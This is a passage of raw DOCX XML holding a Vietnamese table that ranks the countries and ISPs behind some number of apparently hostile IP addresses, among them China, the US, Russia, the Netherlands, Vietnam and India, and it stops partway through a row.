            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tỷ lệ %</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nhà Mạng / Đơn vị Chủ Quản (ISP Chính)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000290">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trung Quốc (CN)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000291">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">142 IP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000292">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">34.0%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000293">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">China Telecom, Alibaba Cloud, Tencent</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94">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000295">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hoa Kỳ (US)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000296">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">86 IP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000297">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20.6%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000298">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DigitalOcean, Amazon Web Services, Linode</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000299">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nga (RU)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">48 IP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">11.5%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hostkey, Rostelecom, Petersburg Internet Network</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9E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hà Lan (NL)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">32 IP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A1">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7.7%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A2">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Serverius Holding, EUNetworks, Tor Exit Nodes</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Việt Nam (VN)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">26 IP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A6">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">6.2%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A7">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Viettel, VNPT, FPT Telecom (Máy tính người dùng bị nhiễm botnet)</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A8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A9">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ấn Độ (IN)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">21 IP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AB">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
